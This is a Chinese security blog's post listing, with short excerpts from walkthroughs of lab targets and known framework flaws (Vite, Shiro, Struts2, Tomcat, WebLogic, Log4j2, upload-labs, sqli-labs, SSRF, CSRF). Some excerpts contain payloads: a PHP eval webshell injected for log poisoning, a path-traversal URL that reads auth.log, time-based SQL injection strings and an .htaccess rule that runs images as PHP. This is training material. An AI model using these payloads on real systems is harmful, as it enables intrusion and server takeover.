- 博客(38)
- 收藏
- 关注
原创 Ollama 未授权访问
Ollama 是一款开源跨平台工具,用于本地化部署和管理大语言模型(如 DeepSeek-R1、Llama、Phi-4 等),支持 macOS、Windows、Linux 及 Docker 容器化运行。(默认监听端口 11434)
2025-03-28 20:11:17
434
原创 Vite任意文件读取漏洞:CVE-2025-30208
Vite是一款现代化的前端开发构建工具,它提供了快速的开发服务器和高效的构建能力,广泛应用于Vue.js项目的开发过程中。由于Vite开发服务器在处理特定URL请求时,没有对请求的路径进行严格的安全检查和限制,导致攻击者可以绕过保护机制,非法访问项目根目录外的敏感文件。攻击者只需在浏览器输入一个URL,就可能会造成源码、SSH密钥、数据库账号、用户数据等目标机器上的任意文件信息泄露。
2025-03-28 19:20:24
552
原创 常见框架漏洞--iis
PUT漏洞漏洞描述IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。
2025-03-24 21:03:40
670
原创 常见框架漏洞--shiro
Shiro漏洞原理Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。Shiro漏洞原理在Shiro框架下,⽤户登陆成功后会⽣成⼀个经过加密的Cookie。其Cookie的Key的值为 RememberMe,Value的值是经过序列化、AES加密和Base64编码后得到的结果。服务端在接收到⼀个Cookie时,会按照如下步骤进⾏解析处理:检索RememberMe Cookie的值进⾏Base64解码。
2025-03-24 19:55:57
197
原创 常见框架漏洞--Spring
Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)环境搭建。
2025-03-24 19:43:37
426
原创 常见框架漏洞--struts2
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。
2025-03-24 19:29:16
437
原创 常见中间件漏洞--Jboss、Apache
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏。
2025-03-23 23:44:04
1264
原创 常⻅中间件漏洞--Tomcat
2. 后台弱⼝令部署war包tomcat是⼀个开源⽽且免费的jsp服务器,默认端⼝ : 8080,属于轻量级应⽤服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的⼀款环境。Tomcat put⽅法任意⽂件写⼊漏洞漏洞描述。
2025-03-23 23:00:04
768
原创 常⻅中间件漏洞--WebLogic
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间 件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
2025-03-23 22:58:53
1247
原创 Vulnhub靶机:Web Machine(N7)
将role的位置进行两次URL解码,一次base64解码,一次MD5解密得到admin。将其输入得到flag的后半段。
2025-03-20 20:45:36
591
原创 常⻅CMS漏洞 -DeDeCMS 获取webshell
姿势⼀:通过⽂件管理器上传WebShellDedeCMS是织梦团队开发PHP ⽹站管理系统,它以简单、易⽤、⾼效为特⾊,组建出各种各样各具特⾊的⽹站姿势⼀:通过⽂件管理器上传WebShell。
2025-03-20 19:43:04
546
原创 常⻅CMS漏洞 Vulhub-WordPress获取shell
后台修改模板拿WebShellWordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。
2025-03-20 18:45:38
479
原创 Log4j2漏洞实战 --反弹shell
log4j2是Apache的⼀个java⽇志框架,我们借助它进⾏⽇志相关操作管理,然⽽在2021年末log4j2爆出了远程代码执⾏漏洞,属于严重等级的漏洞。
2025-03-16 17:55:32
1059
原创 文件解析漏洞详解
IIS解析漏洞IIS解析漏洞环境安装IIS6.X⽬录解析在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件在x.asp中新建⼀个png⽂件。内容为<%=now()%> asp代码。外部浏览器中访问windows2003的iis⽹站中的1.png 发现asp代码被执⾏将1.png⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏畸形⽂件解析。
2025-03-13 18:52:57
1090
原创 tomato靶场通关攻略
http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.loghttp://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>运用蚁剑连接木马,连接成功即可
2025-03-12 23:29:38
526
原创 upload-labs 通关攻略
配置环境后打开4.再次上传,上传成功内容为:<FilesMatch "1.png">SetHandler application/x-httpd-php</FilesMatch>如果文件里面有一个后缀为.png的文件,他就会被解析成.php上传一个文件2.Php,新链接打开图片 文件名末尾添加空格,由于windows命名规范不允许文件名末尾出现空格,所有我们上传1.php空格的话,上传成功以后空格会被windows电脑自动删除,只留下1.php。在windows识别文件的时候,会把::$da
2025-03-11 20:39:54
1324
原创 CTF-Hub SSRF通关攻略
CTFHUB-读取⽂件CTFHUB-内⽹访问CTFHUB-读取⽂件伪协议读取⽂件CTFHUB-端⼝扫描根据题⽬提示端⼝号在8000-9000之内,使⽤BP抓包并进⾏爆破添加payload值,设置取值范围。
2025-03-07 15:54:45
1246
原创 metinfo-CSRF漏洞攻略
由于⽹站对⽤户⽹⻚浏览器的信任导致⽤户在当前已登录的Web站点的状态下,访问攻击者构造的攻击连接从⽽执⾏⾮本意的操作的漏洞。
2025-03-06 20:23:37
356
原创 sqli-labs less16-20
剩余三个表依次查询得 referers uagents users。在username和password处尝试注入均被转义,无法注入。利用Burp Suite抓包 抓到数据发送打Repeater。利用Burp Suite抓包 抓到数据发送打Repeater。bp抓包发送到repeater 方便操作。在user-agent后测试发现。该图表名该关卡为cookie注入。1' and ' 页面正常。1' and ' 页面正常。运用bp进行之后步骤。依次查询剩余数据即可。是referer注入。
2025-03-04 21:29:20
675
原创 sqli-labs通关攻略less13-15
通过BP爆破我们可以得出表名是:emails,referers,uagents,users。通过BP爆破我们得出user表有三个字段,分别为id,username,password。只有正确错误,为布尔盲注,用burpsuite进行抓包处理。bp抓包在之前文章less8有详细记录,有需要可以返回查看。通过BP爆破我们就可以得到我们要的数据。
2025-03-03 23:12:13
444
原创 sqli-labs通关攻略less9-12
使用 Burp 工具开启拦截,并注入,发送都重放器,发送并观察时间。id=1' and sleep(5)--+ #快速执行。id=1" and sleep(5)--+ #休眠5秒。id=1 and sleep(5)--+ #快速执行。1' order by 2# //无报错信息。1' order by 3# //有报错信息。剩余操作流程如less-11,继续查询即可。1 or 1=1# //无回显信息。依据以上操作,判断出所有表名。1")# //有回显信息。1'# //无回显信息。1"# //有报错信息。
2025-03-02 20:23:14
671
原创 sqli-labs通关攻略less5-8
还是在concat的第二个参数的位置查询我们想要的东西,查询是select,既然select不是在句首,而是在句中查询,就要用到子查询,子查询就是放到括号里面去写。id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)' " ') ')) ")依次尝试。
2025-02-27 21:28:49
705
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人